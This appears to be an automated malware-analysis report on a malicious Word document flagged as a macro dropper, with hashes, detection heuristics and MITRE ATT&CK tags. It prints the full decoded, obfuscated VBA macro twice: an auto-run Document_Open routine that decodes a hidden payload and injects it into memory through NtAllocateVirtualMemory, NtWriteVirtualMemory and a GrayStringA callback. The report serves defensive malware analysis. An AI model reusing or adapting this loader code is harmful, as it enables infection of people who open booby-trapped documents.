Office (OLE) malware analysis — malicious · 00fae894f3deafa9

MALICIOUS

Office (OLE)

175.0 KB Created: 2017-02-23 12:28:00 Authoring application: Microsoft Office Word First seen: 2017-02-27

MD5: 1f81cfc32327514b5c798491fa156f0a SHA-1: a63f2755100bd70cd46d7e6cfed8b5803fef2b65 SHA-256: 00fae894f3deafa902029900832082e0ff4b1d55d07503eb0ba8ac9df081d0b0

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic identified the file as Doc.Dropper.ZwMacros-6057750-0, indicating a dropper functionality. The presence of VBA macros, specifically a Document_Open macro, strongly suggests an attempt to automatically execute malicious code upon opening. The VBA code appears to be obfuscated but includes calls to functions that likely facilitate the download and execution of a secondary payload, aligning with the dropper behavior.

Heuristics 4

ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
Dim cestoda As String

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13352 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13352 bytes
SHA-256: `8e13920b17f64a92a944215443499a84d96b6e911b99f686ee63229d221bfb63`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim cestoda As String Dim plantae As String cineration = "blurt" circaea = "be" & "rrie" & "d" saucebox adjective = 5 agelong = 274 nigerian = 34919 capitulation = 588480 capitulation = SYD(capitulation, nigerian, agelong, adjective) End Sub Function agrostis(notion, disjoint, hidebound) #If Win64 Then Dim mistral As Variant Dim deposit As Variant Dim ladle As LongPtr Dim buttondown As LongPtr Dim hygroscopic As LongPtr Dim lethargical As String Dim beardless As LongPtr Dim disturbed As LongPtr #Else Dim buttondown As Long Dim redemption As Long Dim ladle As Long Dim austenitic As Long Dim beardless As Long Dim gaiter As String Dim hygroscopic As Long Dim press As Byte Dim disturbed As Long Dim pseudonym As Variant Dim anaesthetic As Byte #End If catenary = Math.Round(109) rottenness = venison buttondown = notion disturbed = hidebound bandsman = Rnd(327) beardless = disjoint tracheophyta = 19 malicious = 36563 cheery = 599924 detectable = NPer(66 / 541, tracheophyta, -37748, cheery, 0) bandsman = bandsman Or 245 ladle = 53 - 54 footfault ByVal ladle, buttondown, beardless, disturbed, hygroscopic venison = venison End Function Sub add() With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _ .PageNumbers .IncludeChapterNumber = True .ChapterPageSeparator = wdSeparatorEnDash End With End Sub Sub saucebox() Dim nyamwezi As Variant Dim criminalism As Variant dogtrot = ThisDocument.ComputeStatistics(wdStatisticPages) embiotocidae.davids.Value = dogtrot + 9 maundering = "airspace" editorial = "bi" & "as" skindiver = "distraction" Set intervene = embiotocidae.davids.SelectedItem anomaly = 2 pickleherring = 360 inhabitancy = 53914 apidae = 184808 apidae = SYD(apidae, inhabitancy, pickleherring, anomaly) baeotic = intervene.Name episode = 5844 dilatory = Right(baeotic, episode) confront = beelzebub.brachiation(dilatory) mists = 113 pileup = 6743 discipleship = 124597 firstclass = NPer(62 / 551, mists, -37124, discipleship, 0) monegasque = "leg" & "islator" nothosauria = "an" & "them" & "ion" #If Win64 Then Dim lowlander As String Dim lisu As LongPtr Dim invader As LongPtr Dim pneumogastric As Long #Else Dim entellus As Byte Dim invader As Long Dim ductile As Long Dim lisu As Long #End If adjective = 0 inordinately = "burgee" bolus = "extraterrestrial" airfield = 4096 moremajorum = 5 dated = 25229 spain = 169900 toxiferous = NPer(32 / 652, moremajorum, -6721, spain, 1) rapacity = "drawler" mirrored = "anticyclone" ceremonially = 111 reticulum = 24926 ochna = 142953 delphi = NPer(81 / 565, ceremonially, -21610, ochna, 0) gregarine = confront installment = "avant" lisu = antelope(gregarine) brittle = "blissus" gynogenesis = "oxgoad" #If Win64 Then Dim burgoyne As Variant Dim erysiphe As LongPtr chlorothiazide = "nomia" average = "birdman" bedgown = "tegumentary" Dim despiciency As LongPtr cetacea = 93 + 90 + 109 + 1020 #Else metalanguage = "moider" urdu = "he" & "rmet" & "ic" Dim erysiphe As Long aquating = 62 - 34 + 467 Dim despiciency As Long cetacea = aquating + 2659 #End If Dim aquatinta As String Dim chemotherapy As Byte erysiphe = 2 + 50 - 52 invader = lisu + cetacea despiciency = 99 - 91 - 14 + 7 manor = aimlessly(despiciency, despiciency, invader, erysiphe, despiciency, erysiphe, erysiphe, erysiphe, erysiphe) nidicolous = 3 biped = 323 impregnate = 42118 here = 354654 here = SYD(here, impregnate, biped, nidicolous) End Sub Function antelope(functionalism) Dim clinking As Variant Dim dishing As Variant Dim acceptance As Variant Dim menses As Long #If Win64 > 0 Then Dim cuspidation As Long Dim llud As LongPtr conima = 3 - 114 - 83 + 202 Dim autoerotic As LongPtr Dim meson As Byte Dim niveous As String Dim kook As LongPtr Dim compensation As String #Else Dim hap As Integer Dim llud As Long conima = 2 + 32 - 30 Dim autoerotic As Long Dim pyromancy As Variant Dim kook As Long Dim butadiene As Long Dim hb As String #End If mum = VarPtr(llud) dormie = agrostis(mum, VarPtr(functionalism) + 8, conima) bewitchingly = 99 - 100 autoerotic = 0 amygdala = 0 kook = 54 + 9682 cogitate = 4096 obituary = 64 disapprobation = dexter(ByVal bewitchingly, autoerotic, ByVal amygdala, kook, ByVal cogitate, ByVal obituary) bandsman = Fix(70) rottenness = venison agrostis autoerotic, llud, 4384 curculation = 113 suspicion = 17510 dorado = 104745 bitewing = NPer(82 / 384, curculation, -23107, dorado, 1) antelope = autoerotic End Function Attribute VB_Name = "beelzebub" ' ' Chasing after danger, making my heart race, woah #If Win64 Then ' ' Public Declare PtrSafe Function spiny Lib "Shell32.dll" Alias "SHGetDesktopFolder" (hansards As LongPtr) ' ' Chasing the stars, chasing the stars Public Declare PtrSafe Function distraught Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (chiococca As LongPtr, saporific As Any,moneys As LongPtr, intensive As Any) As Boolean ' Love don't come easy at all ' Maybe in a million miles, on a highway through the skies Public Declare PtrSafe Function footfault Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal skin As Any, ByVal fit As Any, ByVal alldevouring As Any, ByVal autotypic As Any, ByVal altar As Any) As LongPtr ' ' Tell me, is this freedom, baby? Public Declare PtrSafe Function deepdyed Lib "Shell32.dll" Alias "SHGetSettings" (aiding As LongPtr,brisbane As LongPtr) As LongPtr ' ' Public Declare PtrSafe Function barney Lib "Shlwapi.dll" Alias "PathFileExists" (caesarem As LongPtr) As LongPtr ' ' Someday soon, we'll be together Public Declare PtrSafe Function stayathome Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal damselfly As LongPtr,microstomus As LongPtr,breathless As LongPtr,activator As LongPtr,dont As LongPtr) As Boolean ' Love don't come easy at all ' Public Declare PtrSafe Function aimlessly Lib "User32.dll" Alias "GrayStringA" ( ByVal alteration As Any, ByVal chumminess As Any, ByVal deposition As Any, ByVal conservator As Any, ByVal presbyopia As Any, ByVal tenuere As Any, ByVal swithins As Any, ByVal dentine As Any, ByVal casquet As Any) As Long ' ' Maybe in a million miles, on a highway through the skies Public Declare PtrSafe Function dexter Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (roster As LongPtr, glitz As LongPtr, ByVal borated As LongPtr,mownByVal As LongPtr, reelection As LongPtr, ByVal curtailment As LongPtr) As LongPtr ' ' Maybe in a million miles, on a highway through the skies ' ' Maybe in a million miles, on a highway through the skies #Else ' ' Maybe in a million miles, on a highway through the skies Public Declare Function accompaniment Lib "Shell32.dll" Alias "SHGetDesktopFolder" (spatangoida As Long) ' ' Maybe in a million miles, on a highway through the skies Public Declare Function occupy Lib "Shell32.dll" Alias "SHGetSettings" (neckband As Long, milieu As Long) As Long ' Chasing the stars, chasing the stars ' Baby I'm yours, baby I'm yours Public Declare Function dexter Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (quisque As Long, scallopine As Long, ByVal leptosporangium As Long, bakingByVal As Long, augustine As Long, ByVal bing As Long) As Long ' Maybe in a million miles, on a highway through the skies ' Public Declare Function aimlessly Lib "User32.dll" Alias "GrayStringA" (ByVal clarence As Any, ByVal culpable As Any, ByVal amputate As Any, ByVal newly As Any, ByVal amrinone As Any, ByVal grubstreet As Any, ByVal mayaca As Any, ByVal amphiuma As Any, ByVal khaki As Any) As Long ' I miss you so much, I miss you so much ' Let me escape in your arms Public Declare Function footfault Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal assagai As Any, ByVal piscine As Any, ByVal brutal As Any, ByVal adverse As Any, ByVal terroe As Any) As Long ' ' I miss you so much, I miss you so much Public Declare Function juramentado Lib "Shlwapi.dll" Alias "PathFileExists" (belamcanda As Long) As Long ' ' Someday soon, we'll be together Public Declare Function tridental Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (pretty As Long, catechismal As Any, constraint As Long, constrict As Any) As Boolean ' ' Baby I'm yours, baby I'm yours Public Declare Function probatum Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal gerbillus As Long, guan As Long, aesop As Long, pickax As Long, inextinguishable As Long) As Boolean ' Maybe on the dark side we can be together, be together ' Let me escape in your arms ' Maybe if the stars align, maybe if our worlds collide ' #End If ' Maybe on the dark side we can be together, be together ' Chasing after danger, making my heart race, woah Function orientate() Dim boatman(255) As Byte literarum = 65 Do boatman(literarum) = literarum - 65 literarum = literarum + 1 Loop Until literarum = 91 literarum = 48 Do boatman(literarum) = literarum + 4 literarum = literarum + 1 Loop Until literarum = 58 literarum = 97 Do boatman(literarum) = literarum - 71 literarum = literarum + 1 Loop Until literarum = 123 boatman(47) = 63 literarum = 43 boatman(literarum) = 62 orientate = boatman End Function Sub dup() Dim Range1 As Range, Range2 As Range Set Range1 = Selection.Range.Duplicate Set Range2 = ActiveDocument.Bookmarks(1).Range Range2.Paragraphs(1).Range = Range2 End Sub Function couplet(dishabille, activism, pteriidae) Select Case pteriidae Case 15 couplet = dishabille \ activism Case 25 couplet = dishabille And activism Case 33 couplet = dishabille * activism End Select End Function Function brachiation(nailery) As String venison = jeter venison = venison Dim arctocebus As Long Dim antihistamine As Integer Dim aerosol(63) As Long Dim inconsequential(6965) As Byte Dim chard As Integer catenary = catenary * 4 Dim chivalric(63) As Long Dim exemplar As Long Dim economize As Variant Dim pachycephala(63) As Long Dim colima As Long Dim clue As Long Dim entering As String Dim brash As String Dim dwarf As Long Dim bimonthly() As Byte bonesetter = 16515072 Dim hake As Long farrow = 65536 chanted = 16711680 Dim noisily As Byte onsite = 114 - 101 + 4083 adenium = 15 + 55 - 90 + 258068 pichi = 256 childishly = 65280 postal = 104 - 26 + 262066 civile = 40 - 87 + 4079 Dim patrick As Variant eater = 1 + 24 - 121 + 351 myopic = 63 protoctista = 71 - 41 + 34 Dim alteri As Variant allocation = 0 forepaw = 5843 Dim amen() As Byte Dim papaya As Long amen = VBA.Strings.StrConv(nailery, vbFromUnicode) Dim consonantal As Integer nauseate = 5 embarrass = 223 appropinquate = 39183 dividable = 314905 dividable = SYD(dividable, appropinquate, embarrass, nauseate) lignified = 5843 extrajudicial = Sqr(RGB(0, 1, 0)) For dilleniaceae = 0 To lignified If dilleniaceae Mod 2 = 0 Then amen(dilleniaceae) = amen(dilleniaceae) + extrajudicial Else amen(dilleniaceae) = amen(dilleniaceae) + extrajudicial - 1 End If Next dilleniaceae throughout = 6 simply = 169 phyllostachys = 53523 excrescence = 411554 excrescence = SYD(excrescence, phyllostachys, simply, throughout) antihistamine = 0 polity = 2 + 60 - 62 acknowledgeable = 25 + 18 parulidae = orientate For arctocebus = 0 To 63 aerosol(arctocebus) = couplet(arctocebus, protoctista, 33) chivalric(arctocebus) = couplet(arctocebus, onsite, 33) pachycephala(arctocebus) = couplet(arctocebus, postal, 33) Next arctocebus potboy = 5 metuit = 184 investigate = 57837 caeca = 120874 caeca = SYD(caeca, investigate, metuit, potboy) bimonthly = amen rags = 4 vaporer = 5 accouterments = 388 unguent = 50245 receiving = 161630 receiving = SYD(receiving, unguent, accouterments, vaporer) paltriness = 68 - 65 jeter = "redbone" catenary = Math.Round(81) nab = paltriness + 1 paunch = 2 For clue = 0 To lignified snowflake = bimonthly(clue) steeplechaser = bimonthly(clue + 2) dwarf = pachycephala(parulidae(snowflake)) _ + chivalric(parulidae(bimonthly(clue + 1))) + aerosol(parulidae(steeplechaser)) + parulidae(bimonthly(clue + paltriness)) arctocebus = couplet(dwarf, chanted, 25) inconsequential(exemplar) = couplet(arctocebus, farrow, 15) arctocebus = couplet(dwarf, childishly, 25) inconsequential(exemplar + 1) = couplet(arctocebus, pichi, 15) inconsequential(exemplar + paunch) = couplet(dwarf, eater, 25) exemplar = exemplar + paunch + 1 clue = clue + 3 Next brachiation = inconsequential End Function Function articulo(clitoral) articulo = AscW(clitoral) End Function Attribute VB_Name = "embiotocidae" Attribute VB_Base = "0{B8939E0F-65DD-42DB-A6A0-A250446B3213}{E380B6C1-68A6-414F-9604-B55C4E3971A4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 8e13920b17f64a92a944215443499a84d96b6e911b99f686ee63229d221bfb63

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim cestoda As String
Dim plantae As String
cineration = "blurt"
circaea = "be" & "rrie" & "d"
saucebox
adjective = 5
agelong = 274
nigerian = 34919
capitulation = 588480
capitulation = SYD(capitulation, nigerian, agelong, adjective)
End Sub
Function agrostis(notion, disjoint, hidebound)
#If Win64 Then
Dim mistral As Variant
Dim deposit As Variant
Dim ladle As LongPtr
Dim buttondown As LongPtr
Dim hygroscopic As LongPtr
Dim lethargical As String
Dim beardless As LongPtr
Dim disturbed As LongPtr
#Else
Dim buttondown As Long
Dim redemption As Long
Dim ladle As Long
Dim austenitic As Long
Dim beardless As Long
Dim gaiter As String
Dim hygroscopic As Long
Dim press As Byte
Dim disturbed As Long
Dim pseudonym As Variant
Dim anaesthetic As Byte
#End If
catenary = Math.Round(109)
rottenness = venison
buttondown = notion
disturbed = hidebound
bandsman = Rnd(327)
beardless = disjoint
tracheophyta = 19
malicious = 36563
cheery = 599924
detectable = NPer(66 / 541, tracheophyta, -37748, cheery, 0)

bandsman = bandsman Or 245
ladle = 53 - 54
footfault ByVal ladle, buttondown, beardless, disturbed, hygroscopic
venison = venison
End Function
Sub add()
    With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
        .PageNumbers
        .IncludeChapterNumber = True
        .ChapterPageSeparator = wdSeparatorEnDash
    End With
End Sub

Sub saucebox()
Dim nyamwezi As Variant
Dim criminalism As Variant
dogtrot = ThisDocument.ComputeStatistics(wdStatisticPages)
embiotocidae.davids.Value = dogtrot + 9
maundering = "airspace"
editorial = "bi" & "as"
skindiver = "distraction"
Set intervene = embiotocidae.davids.SelectedItem
anomaly = 2
pickleherring = 360
inhabitancy = 53914
apidae = 184808
apidae = SYD(apidae, inhabitancy, pickleherring, anomaly)

baeotic = intervene.Name
episode = 5844
dilatory = Right(baeotic, episode)
confront = beelzebub.brachiation(dilatory)
mists = 113
pileup = 6743
discipleship = 124597
firstclass = NPer(62 / 551, mists, -37124, discipleship, 0)

monegasque = "leg" & "islator"
nothosauria = "an" & "them" & "ion"
#If Win64 Then
Dim lowlander As String
Dim lisu As LongPtr
Dim invader As LongPtr
Dim pneumogastric As Long
#Else
Dim entellus As Byte
Dim invader As Long
Dim ductile As Long
Dim lisu As Long
#End If
adjective = 0
inordinately = "burgee"
bolus = "extraterrestrial"
airfield = 4096
moremajorum = 5
dated = 25229
spain = 169900
toxiferous = NPer(32 / 652, moremajorum, -6721, spain, 1)

rapacity = "drawler"
mirrored = "anticyclone"
ceremonially = 111
reticulum = 24926
ochna = 142953
delphi = NPer(81 / 565, ceremonially, -21610, ochna, 0)

gregarine = confront
installment = "avant"
lisu = antelope(gregarine)
brittle = "blissus"
gynogenesis = "oxgoad"
#If Win64 Then
Dim burgoyne As Variant
Dim erysiphe As LongPtr
chlorothiazide = "nomia"
average = "birdman"
bedgown = "tegumentary"
Dim despiciency As LongPtr
cetacea = 93 + 90 + 109 + 1020
#Else
metalanguage = "moider"
urdu = "he" & "rmet" & "ic"
Dim erysiphe As Long
aquating = 62 - 34 + 467
Dim despiciency As Long
cetacea = aquating + 2659

#End If
Dim aquatinta As String
Dim chemotherapy As Byte
erysiphe = 2 + 50 - 52
invader = lisu + cetacea
despiciency = 99 - 91 - 14 + 7
manor = aimlessly(despiciency, despiciency, invader, erysiphe, despiciency, erysiphe, erysiphe, erysiphe, erysiphe)
nidicolous = 3
biped = 323
impregnate = 42118
here = 354654
here = SYD(here, impregnate, biped, nidicolous)

End Sub

Function antelope(functionalism)
Dim clinking As Variant
Dim dishing As Variant
Dim acceptance As Variant
Dim menses As Long
#If Win64 > 0 Then
Dim cuspidation As Long
Dim llud As LongPtr
conima = 3 - 114 - 83 + 202
Dim autoerotic As LongPtr
Dim meson As Byte
Dim niveous As String
Dim kook As LongPtr
Dim compensation As String
#Else
Dim hap As Integer
Dim llud As Long
conima = 2 + 32 - 30
Dim autoerotic As Long
Dim pyromancy As Variant
Dim kook As Long
Dim butadiene As Long
Dim hb As String
#End If
mum = VarPtr(llud)
dormie = agrostis(mum, VarPtr(functionalism) + 8, conima)
bewitchingly = 99 - 100
autoerotic = 0
amygdala = 0
kook = 54 + 9682
cogitate = 4096
obituary = 64
disapprobation = dexter(ByVal bewitchingly, autoerotic, ByVal amygdala, kook, ByVal cogitate, ByVal obituary)
bandsman = Fix(70)

rottenness = venison

agrostis autoerotic, llud, 4384
curculation = 113
suspicion = 17510
dorado = 104745
bitewing = NPer(82 / 384, curculation, -23107, dorado, 1)

antelope = autoerotic
End Function


Attribute VB_Name = "beelzebub"
'
'  Chasing after danger, making my heart race, woah
#If Win64 Then
'
'
Public Declare PtrSafe Function spiny Lib "Shell32.dll" Alias "SHGetDesktopFolder" (hansards As LongPtr)
'
'  Chasing the stars, chasing the stars
Public Declare PtrSafe Function distraught Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (chiococca As LongPtr, saporific As Any,moneys As LongPtr, intensive As Any) As Boolean
'  Love don't come easy at all
'  Maybe in a million miles, on a highway through the skies
Public Declare PtrSafe Function footfault Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal skin As Any, ByVal fit As Any, ByVal alldevouring As Any, ByVal autotypic As Any, ByVal altar As Any) As LongPtr
'
'  Tell me, is this freedom, baby?
Public Declare PtrSafe Function deepdyed Lib "Shell32.dll" Alias "SHGetSettings" (aiding As LongPtr,brisbane As LongPtr) As LongPtr
'
'
Public Declare PtrSafe Function barney Lib "Shlwapi.dll" Alias "PathFileExists" (caesarem As LongPtr) As LongPtr
'
'  Someday soon, we'll be together
Public Declare PtrSafe Function stayathome Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal damselfly As LongPtr,microstomus As LongPtr,breathless As LongPtr,activator As LongPtr,dont As LongPtr) As Boolean
'  Love don't come easy at all
'
Public  Declare PtrSafe Function aimlessly Lib "User32.dll" Alias "GrayStringA" ( ByVal alteration As Any, ByVal chumminess As Any, ByVal deposition As Any, ByVal conservator As Any, ByVal presbyopia As Any, ByVal tenuere As Any, ByVal swithins As Any, ByVal dentine As Any, ByVal casquet As Any) As Long
'
'  Maybe in a million miles, on a highway through the skies
Public Declare PtrSafe Function dexter Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (roster As LongPtr, glitz As LongPtr, ByVal borated As LongPtr,mownByVal As LongPtr, reelection As LongPtr, ByVal curtailment As LongPtr) As LongPtr
'
'  Maybe in a million miles, on a highway through the skies

'
'  Maybe in a million miles, on a highway through the skies
#Else
'
'  Maybe in a million miles, on a highway through the skies
Public Declare Function accompaniment Lib "Shell32.dll" Alias "SHGetDesktopFolder" (spatangoida As Long)
'
'  Maybe in a million miles, on a highway through the skies
Public Declare Function occupy Lib "Shell32.dll" Alias "SHGetSettings" (neckband As Long, milieu As Long) As Long
'  Chasing the stars, chasing the stars
'  Baby I'm yours, baby I'm yours
Public Declare Function dexter Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (quisque As Long, scallopine As Long, ByVal leptosporangium As Long, bakingByVal As Long, augustine As Long, ByVal bing As Long) As Long
'  Maybe in a million miles, on a highway through the skies
'
Public Declare Function aimlessly Lib "User32.dll" Alias "GrayStringA" (ByVal clarence As Any, ByVal culpable As Any, ByVal amputate As Any, ByVal newly As Any, ByVal amrinone As Any, ByVal grubstreet As Any, ByVal mayaca As Any, ByVal amphiuma As Any, ByVal khaki As Any) As Long
'  I miss you so much, I miss you so much
'  Let me escape in your arms
Public Declare Function footfault Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal assagai As Any, ByVal piscine As Any, ByVal brutal As Any, ByVal adverse As Any, ByVal terroe As Any) As Long
'
'  I miss you so much, I miss you so much
Public Declare Function juramentado Lib "Shlwapi.dll" Alias "PathFileExists" (belamcanda As Long) As Long
'
'  Someday soon, we'll be together
Public Declare Function tridental Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (pretty As Long, catechismal As Any, constraint As Long, constrict As Any) As Boolean
'
'  Baby I'm yours, baby I'm yours
Public Declare Function probatum Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal gerbillus As Long, guan As Long, aesop As Long, pickax As Long, inextinguishable As Long) As Boolean
'  Maybe on the dark side we can be together, be together
'  Let me escape in your arms

'  Maybe if the stars align, maybe if our worlds collide
'
#End If
'  Maybe on the dark side we can be together, be together
'  Chasing after danger, making my heart race, woah
Function orientate()
Dim boatman(255) As Byte
literarum = 65
Do
boatman(literarum) = literarum - 65
literarum = literarum + 1
Loop Until literarum = 91
literarum = 48
Do
boatman(literarum) = literarum + 4
literarum = literarum + 1
Loop Until literarum = 58
literarum = 97
Do
boatman(literarum) = literarum - 71
literarum = literarum + 1
Loop Until literarum = 123
boatman(47) = 63
literarum = 43
boatman(literarum) = 62
orientate = boatman
End Function
Sub dup()
    Dim Range1 As Range, Range2 As Range
    Set Range1 = Selection.Range.Duplicate
    Set Range2 = ActiveDocument.Bookmarks(1).Range
    Range2.Paragraphs(1).Range = Range2
End Sub


Function couplet(dishabille, activism, pteriidae)
Select Case pteriidae
Case 15
couplet = dishabille \ activism
Case 25
couplet = dishabille And activism
Case 33
couplet = dishabille * activism
End Select
End Function
Function brachiation(nailery) As String
venison = jeter

venison = venison

Dim arctocebus As Long
Dim antihistamine As Integer
Dim aerosol(63) As Long
Dim inconsequential(6965) As Byte
Dim chard As Integer

catenary = catenary * 4

Dim chivalric(63) As Long
Dim exemplar As Long
Dim economize As Variant

Dim pachycephala(63) As Long
Dim colima As Long

Dim clue As Long
Dim entering As String
Dim brash As String

Dim dwarf As Long
Dim bimonthly() As Byte
bonesetter = 16515072
Dim hake As Long

farrow = 65536
chanted = 16711680
Dim noisily As Byte

onsite = 114 - 101 + 4083
adenium = 15 + 55 - 90 + 258068
pichi = 256
childishly = 65280
postal = 104 - 26 + 262066
civile = 40 - 87 + 4079
Dim patrick As Variant

eater = 1 + 24 - 121 + 351
myopic = 63
protoctista = 71 - 41 + 34
Dim alteri As Variant
allocation = 0
forepaw = 5843
Dim amen() As Byte
Dim papaya As Long
amen = VBA.Strings.StrConv(nailery, vbFromUnicode)
Dim consonantal As Integer
nauseate = 5
embarrass = 223
appropinquate = 39183
dividable = 314905
dividable = SYD(dividable, appropinquate, embarrass, nauseate)

lignified = 5843
extrajudicial = Sqr(RGB(0, 1, 0))
For dilleniaceae = 0 To lignified
If dilleniaceae Mod 2 = 0 Then
amen(dilleniaceae) = amen(dilleniaceae) + extrajudicial
Else
amen(dilleniaceae) = amen(dilleniaceae) + extrajudicial - 1
End If
Next dilleniaceae
throughout = 6
simply = 169
phyllostachys = 53523
excrescence = 411554
excrescence = SYD(excrescence, phyllostachys, simply, throughout)

antihistamine = 0
polity = 2 + 60 - 62
acknowledgeable = 25 + 18
parulidae = orientate
For arctocebus = 0 To 63
aerosol(arctocebus) = couplet(arctocebus, protoctista, 33)
chivalric(arctocebus) = couplet(arctocebus, onsite, 33)
pachycephala(arctocebus) = couplet(arctocebus, postal, 33)
Next arctocebus
potboy = 5
metuit = 184
investigate = 57837
caeca = 120874
caeca = SYD(caeca, investigate, metuit, potboy)

bimonthly = amen
rags = 4
vaporer = 5
accouterments = 388
unguent = 50245
receiving = 161630
receiving = SYD(receiving, unguent, accouterments, vaporer)

paltriness = 68 - 65
jeter = "redbone"

catenary = Math.Round(81)

nab = paltriness + 1
paunch = 2
For clue = 0 To lignified
snowflake = bimonthly(clue)
steeplechaser = bimonthly(clue + 2)
dwarf = pachycephala(parulidae(snowflake)) _
 + chivalric(parulidae(bimonthly(clue + 1))) + aerosol(parulidae(steeplechaser)) + parulidae(bimonthly(clue + paltriness))
arctocebus = couplet(dwarf, chanted, 25)
inconsequential(exemplar) = couplet(arctocebus, farrow, 15)
arctocebus = couplet(dwarf, childishly, 25)
inconsequential(exemplar + 1) = couplet(arctocebus, pichi, 15)
inconsequential(exemplar + paunch) = couplet(dwarf, eater, 25)
exemplar = exemplar + paunch + 1
clue = clue + 3
Next
brachiation = inconsequential
End Function

Function articulo(clitoral)
articulo = AscW(clitoral)
End Function


Attribute VB_Name = "embiotocidae"
Attribute VB_Base = "0{B8939E0F-65DD-42DB-A6A0-A250446B3213}{E380B6C1-68A6-414F-9604-B55C4E3971A4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.